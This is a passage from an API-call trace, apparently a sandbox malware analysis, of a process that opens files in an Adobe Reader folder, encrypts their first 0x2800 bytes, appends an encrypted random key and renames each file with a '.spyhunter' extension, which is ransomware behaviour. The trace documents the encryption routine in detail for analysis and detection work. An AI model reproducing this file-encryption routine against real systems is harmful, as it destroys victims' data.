lpNumberOfBytesRead=0x25cf94c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x25cf94c*=0x2800, lpOverlapped=0x0) returned 1 [0117.510] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0117.510] WriteFile (in: hFile=0x154, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25cf94c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x25cf94c*=0x2800, lpOverlapped=0x0) returned 1 [0117.510] GetProcessHeap () returned 0x2c0000 [0117.510] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0117.510] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0117.510] WriteFile (in: hFile=0x154, lpBuffer=0x25cf98c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf94c, lpOverlapped=0x0 | out: lpBuffer=0x25cf98c*, lpNumberOfBytesWritten=0x25cf94c*=0x4, lpOverlapped=0x0) returned 1 [0117.523] WriteFile (in: hFile=0x154, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf94c, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x25cf94c*=0x30, lpOverlapped=0x0) returned 1 [0117.523] CloseHandle (hObject=0x154) returned 1 [0117.897] GetProcessHeap () returned 0x2c0000 [0117.897] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ed7c78 [0117.897] wnsprintfW (in: pszDest=0x2ed7c78, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\FRA\\SignHere.pdf.spyhunter") returned 106 [0117.897] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\FRA\\SignHere.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\fra\\signhere.pdf"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\FRA\\SignHere.pdf.spyhunter" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\fra\\signhere.pdf.spyhunter")) returned 1 [0117.898] GetProcessHeap () returned 0x2c0000 [0117.898] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ed7c78 | out: hHeap=0x2c0000) returned 1 [0117.898] GetProcessHeap () returned 0x2c0000 [0117.898] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0117.898] GetProcessHeap () returned 0x2c0000 [0117.898] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e929d8 | out: hHeap=0x2c0000) returned 1 [0117.900] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf988 | out: pbBuffer=0x25cf988) returned 1 [0117.900] GetProcessHeap () returned 0x2c0000 [0117.900] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0117.900] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25cf980*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25cf980*=0x30) returned 1 [0117.900] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\NOR\\StandardBusiness.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\nor\\standardbusiness.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0117.900] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\NOR\\StandardBusiness.pdf") returned 104 [0117.900] StrStrW (lpFirst="StandardBusiness.pdf", lpSrch=".txt") returned 0x0 [0117.901] GetProcessHeap () returned 0x2c0000 [0117.901] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0117.901] ReadFile (in: hFile=0x154, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf944, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x25cf944*=0x2800, lpOverlapped=0x0) returned 1 [0117.917] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0117.917] WriteFile (in: hFile=0x154, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25cf944, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x25cf944*=0x2800, lpOverlapped=0x0) returned 1 [0117.917] GetProcessHeap () returned 0x2c0000 [0117.917] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0117.917] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0117.917] WriteFile (in: hFile=0x154, lpBuffer=0x25cf984*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf944, lpOverlapped=0x0 | out: lpBuffer=0x25cf984*, lpNumberOfBytesWritten=0x25cf944*=0x4, lpOverlapped=0x0) returned 1 [0117.925] WriteFile (in: hFile=0x154, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf944, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x25cf944*=0x30, lpOverlapped=0x0) returned 1 [0117.926] CloseHandle (hObject=0x154) returned 1 [0117.926] GetProcessHeap () returned 0x2c0000 [0117.926] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ec7c30 [0117.926] wnsprintfW (in: pszDest=0x2ec7c30, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\NOR\\StandardBusiness.pdf.spyhunter") returned 114 [0117.926] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\NOR\\StandardBusiness.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\nor\\standardbusiness.pdf"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\NOR\\StandardBusiness.pdf.spyhunter" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\nor\\standardbusiness.pdf.spyhunter")) returned 1 [0117.928] GetProcessHeap () returned 0x2c0000 [0117.928] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec7c30 | out: hHeap=0x2c0000) returned 1 [0117.928] GetProcessHeap () returned 0x2c0000 [0117.928] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0117.928] GetProcessHeap () returned 0x2c0000 [0117.928] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ef2a18 | out: hHeap=0x2c0000) returned 1 [0117.929] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf980 | out: pbBuffer=0x25cf980) returned 1 [0117.929] GetProcessHeap () returned 0x2c0000 [0117.929] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0117.929] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25cf978*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25cf978*=0x30) returned 1 [0117.929] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\PTB\\StandardBusiness.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\ptb\\standardbusiness.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0117.930] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\PTB\\StandardBusiness.pdf") returned 104 [0117.930] StrStrW (lpFirst="StandardBusiness.pdf", lpSrch=".txt") returned 0x0 [0117.930] GetProcessHeap () returned 0x2c0000 [0117.930] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0117.930] ReadFile (in: hFile=0x154, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf93c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x25cf93c*=0x2800, lpOverlapped=0x0) returned 1 [0118.000] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0118.000] WriteFile (in: hFile=0x154, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25cf93c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x25cf93c*=0x2800, lpOverlapped=0x0) returned 1 [0118.000] GetProcessHeap () returned 0x2c0000 [0118.000] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0118.000] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0118.000] WriteFile (in: hFile=0x154, lpBuffer=0x25cf97c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf93c, lpOverlapped=0x0 | out: lpBuffer=0x25cf97c*, lpNumberOfBytesWritten=0x25cf93c*=0x4, lpOverlapped=0x0) returned 1 [0118.001] WriteFile (in: hFile=0x154, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf93c, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x25cf93c*=0x30, lpOverlapped=0x0) returned 1 [0118.001] CloseHandle (hObject=0x154) returned 1 [0118.011] GetProcessHeap () returned 0x2c0000 [0118.011] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ec7c30 [0118.011] wnsprintfW (in: pszDest=0x2ec7c30, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\PTB\\StandardBusiness.pdf.spyhunter") returned 114 [0118.011] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\PTB\\StandardBusiness.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\ptb\\standardbusiness.pdf"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\PTB\\StandardBusiness.pdf.spyhunter" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\ptb\\standardbusiness.pdf.spyhunter")) returned 1 [0118.012] GetProcessHeap () returned 0x2c0000 [0118.012] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec7c30 | out: hHeap=0x2c0000) returned 1 [0118.012] GetProcessHeap () returned 0x2c0000 [0118.012] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0118.012] GetProcessHeap () returned 0x2c0000 [0118.012] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ef2200 | out: hHeap=0x2c0000) returned 1 [0118.012] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf980 | out: pbBuffer=0x25cf980) returned 1 [0118.012] GetProcessHeap () returned 0x2c0000 [0118.012] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0118.012] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25cf978*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25cf978*=0x30) returned 1 [0118.012] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SKY\\SignHere.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\sky\\signhere.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0118.017] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SKY\\SignHere.pdf") returned 96 [0118.017] StrStrW (lpFirst="SignHere.pdf", lpSrch=".txt") returned 0x0 [0118.017] GetProcessHeap () returned 0x2c0000 [0118.018] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0118.018] ReadFile (in: hFile=0x17c, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf93c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x25cf93c*=0x2800, lpOverlapped=0x0) returned 1 [0118.045] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0118.046] WriteFile (in: hFile=0x17c, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25cf93c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x25cf93c*=0x2800, lpOverlapped=0x0) returned 1 [0118.049] GetProcessHeap () returned 0x2c0000 [0118.049] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0118.049] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0118.049] WriteFile (in: hFile=0x17c, lpBuffer=0x25cf97c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf93c, lpOverlapped=0x0 | out: lpBuffer=0x25cf97c*, lpNumberOfBytesWritten=0x25cf93c*=0x4, lpOverlapped=0x0) returned 1 [0118.079] WriteFile (in: hFile=0x17c, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf93c, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x25cf93c*=0x30, lpOverlapped=0x0) returned 1 [0118.079] CloseHandle (hObject=0x17c) returned 1 [0118.079] GetProcessHeap () returned 0x2c0000 [0118.079] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ec7c30 [0118.079] wnsprintfW (in: pszDest=0x2ec7c30, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SKY\\SignHere.pdf.spyhunter") returned 106 [0118.079] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SKY\\SignHere.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\sky\\signhere.pdf"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SKY\\SignHere.pdf.spyhunter" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\sky\\signhere.pdf.spyhunter")) returned 1 [0118.080] GetProcessHeap () returned 0x2c0000 [0118.080] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec7c30 | out: hHeap=0x2c0000) returned 1 [0118.080] GetProcessHeap () returned 0x2c0000 [0118.080] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0118.080] GetProcessHeap () returned 0x2c0000 [0118.080] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e48250 | out: hHeap=0x2c0000) returned 1 [0118.080] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf978 | out: pbBuffer=0x25cf978) returned 1 [0118.080] GetProcessHeap () returned 0x2c0000 [0118.080] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0118.080] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25cf970*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25cf970*=0x30) returned 1 [0118.080] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SVE\\Dynamic.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\sve\\dynamic.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0118.081] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SVE\\Dynamic.pdf") returned 95 [0118.081] StrStrW (lpFirst="Dynamic.pdf", lpSrch=".txt") returned 0x0 [0118.081] GetProcessHeap () returned 0x2c0000 [0118.081] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0118.081] ReadFile (in: hFile=0x17c, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf934, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x25cf934*=0x2800, lpOverlapped=0x0) returned 1 [0118.266] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0118.266] WriteFile (in: hFile=0x17c, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25cf934, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x25cf934*=0x2800, lpOverlapped=0x0) returned 1 [0118.266] GetProcessHeap () returned 0x2c0000 [0118.266] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0118.266] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0118.267] WriteFile (in: hFile=0x17c, lpBuffer=0x25cf974*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf934, lpOverlapped=0x0 | out: lpBuffer=0x25cf974*, lpNumberOfBytesWritten=0x25cf934*=0x4, lpOverlapped=0x0) returned 1 [0118.273] WriteFile (in: hFile=0x17c, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf934, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x25cf934*=0x30, lpOverlapped=0x0) returned 1 [0118.273] CloseHandle (hObject=0x17c) returned 1 [0118.273] GetProcessHeap () returned 0x2c0000 [0118.273] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ec6058 [0118.273] wnsprintfW (in: pszDest=0x2ec6058, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SVE\\Dynamic.pdf.spyhunter") returned 105 [0118.273] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SVE\\Dynamic.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\sve\\dynamic.pdf"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SVE\\Dynamic.pdf.spyhunter" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\sve\\dynamic.pdf.spyhunter")) returned 1 [0118.274] GetProcessHeap () returned 0x2c0000 [0118.274] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec6058 | out: hHeap=0x2c0000) returned 1 [0118.274] GetProcessHeap () returned 0x2c0000 [0118.274] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0118.274] GetProcessHeap () returned 0x2c0000 [0118.275] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ef53f0 | out: hHeap=0x2c0000) returned 1 [0118.275] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf978 | out: pbBuffer=0x25cf978) returned 1 [0118.275] GetProcessHeap () returned 0x2c0000 [0118.275] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0118.275] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25cf970*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25cf970*=0x30) returned 1 [0118.275] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\EScript.api" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\escript.api"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0118.276] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\EScript.api") returned 72 [0118.276] StrStrW (lpFirst="EScript.api", lpSrch=".txt") returned 0x0 [0118.276] GetProcessHeap () returned 0x2c0000 [0118.276] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0118.276] ReadFile (in: hFile=0x17c, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf934, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x25cf934*=0x2800, lpOverlapped=0x0) returned 1 [0118.330] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0118.330] WriteFile (in: hFile=0x17c, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25cf934, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x25cf934*=0x2800, lpOverlapped=0x0) returned 1 [0118.330] GetProcessHeap () returned 0x2c0000 [0118.330] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0118.330] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0118.330] WriteFile (in: hFile=0x17c, lpBuffer=0x25cf974*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf934, lpOverlapped=0x0 | out: lpBuffer=0x25cf974*, lpNumberOfBytesWritten=0x25cf934*=0x4, lpOverlapped=0x0) returned 1 [0118.396] WriteFile (in: hFile=0x17c, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf934, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x25cf934*=0x30, lpOverlapped=0x0) returned 1 [0118.396] CloseHandle (hObject=0x17c) returned 1 [0118.396] GetProcessHeap () returned 0x2c0000 [0118.396] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2e95b58 [0118.396] wnsprintfW (in: pszDest=0x2e95b58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\EScript.api.spyhunter") returned 82 [0118.396] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\EScript.api" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\escript.api"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\EScript.api.spyhunter" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\escript.api.spyhunter")) returned 1 [0118.397] GetProcessHeap () returned 0x2c0000 [0118.397] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e95b58 | out: hHeap=0x2c0000) returned 1 [0118.397] GetProcessHeap () returned 0x2c0000 [0118.398] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0118.398] GetProcessHeap () returned 0x2c0000 [0118.398] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e44368 | out: hHeap=0x2c0000) returned 1 [0118.398] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf970 | out: pbBuffer=0x25cf970) returned 1 [0118.398] GetProcessHeap () returned 0x2c0000 [0118.398] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0118.398] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25cf968*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25cf968*=0x30) returned 1 [0118.398] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\DigSig.api" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\digsig.api"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0118.399] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\DigSig.api") returned 71 [0118.399] StrStrW (lpFirst="DigSig.api", lpSrch=".txt") returned 0x0 [0118.399] GetProcessHeap () returned 0x2c0000 [0118.399] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0118.399] ReadFile (in: hFile=0x17c, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf92c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x25cf92c*=0x2800, 